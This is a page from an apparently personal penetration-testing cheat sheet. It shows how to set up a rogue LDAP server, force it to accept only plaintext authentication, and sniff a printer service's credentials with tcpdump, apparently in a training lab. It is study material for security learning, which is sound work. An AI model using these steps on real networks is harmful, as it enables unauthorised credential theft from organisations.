Cheat Sheet Hacking
  • 🌐Generic Ideas
    • File Transfer
    • Reverse Shell
    • Cracking Tricks
    • Tunneling and Port Forwarding
    • Reversing
    • OSINT
    • Phishing
  • 🐕‍🦺Port enumeration
    • Reconnaissance
    • 53 - DNS
    • 80,443 - Web
      • Identify php.ini file used
      • Exploitation
        • File Upload
        • XXS
    • 445 - SMB
    • 389, 636, 3268 - LDAP(S)
  • LINUX THINGS
    • Enumeration
    • Privilege Escalation
      • Writable $PATH
  • WINDOWS THINGS
    • Enumeration
    • Useful Commands
    • Active Directory Methodology
      • Commands to create AD environment
      • Attacks
        • Kerberos
          • User enumeration
          • ASREP-Roast
          • Kerberoasting
          • ASREP-Roast VS Kerberoasting
          • Golden Ticket
          • Resource Based Constrained Delegation
        • Secrets dump
        • Pass The Hash
        • Dump NTDS
        • Tickets
          • TGT
        • NTML Password Spray
        • LDAP Authentication
          • LDAP Pass-back
          • Rogue LDAP Server
        • SMB Relay (LLNMR, NTB-NS & WPAD)
        • NTLM Relay
        • Tools to exploit AD things
        • SCF Files
      • Kerberos
      • SAM & LSA secrets
      • Enumeration
        • BloodHound
        • PowerView
          • CheatSheet of Commands
        • Set DNS & DOMAIN
      • Resources
      • RunAs
      • Post Explotation
        • Persistence
        • Mimikatz
      • Common used tools
  • 🕳️Pivoting
    • Port Forwarding
    • Socks Forwarding
    • Routing
    • Web Fuzzing
    • Transfer files
    • Metasploit
      • Single Pivot
      • Double Pivot
    • Burp Suite
  • 🎛️Hardware
    • Physical attacks
  • 🌕Buffer Overflow
    • Introduction
    • Stack-Based
      • Introduction
        • Spiking
        • Fuzzing
        • Find Offset
        • Overwrite EIP
        • Find module
        • Find Badchars
        • Shellcode
  • 🐳Docker
    • Commands
    • Practical examples
  • 💡Useful things
    • Burp Suite
      • Proxy Activation
    • Linux Commands
    • Recreate multipart/form-data request
      • Python
      • HTML & netcat
    • TTY
    • Templates for reports (exams)
    • Tmux
    • Other cheat sheets
Powered by GitBook
On this page
  • Update configuration
  • Verify configuration
  • Capturing LDAP Credentials
  1. WINDOWS THINGS
  2. Active Directory Methodology
  3. Attacks
  4. LDAP Authentication

Rogue LDAP Server

sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd

  • Omit initial configuration?: No

  • DNS domain name: target domain

  • Organization name: target domain

  • Administrator password: anything, but remember it

  • Database removed?: No

  • Move old database?: Yes

Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.

Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms. We want to ensure that our LDAP server only supports PLAIN and LOGIN authentication methods. To do this, we need to create a new ldif file, called with the following content:

cat ./olcSaslSecProps.ldif
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

  • olcSaslSecProps: Specifies the SASL security properties

  • noanonymous: Disables mechanisms that support anonymous login

  • minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.

Update configuration

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify configuration

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

We have our LDAP server running under the 389 port.

Capturing LDAP Credentials

sudo tcpdump -SX -i breachad tcp port 389
   -S
   --absolute-tcp-sequence-numbers
          Print absolute, rather than relative, TCP sequence numbers.
          
   -X     When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and  ASCII.
          This is very handy for analysing new protocols.  In the current implementation this flag may have the same effect as -XX if the packet is truncated.

And we are able to retrieve the plain text password used for the Printer Service against LDAP.

PreviousLDAP Pass-backNextSMB Relay (LLNMR, NTB-NS & WPAD)

Last updated 6 months ago

NetIQ Documentation: Guía de resolución de problemas de eDirectory 8.8 SP8 de NetIQ - Descripción de LDIF
Logo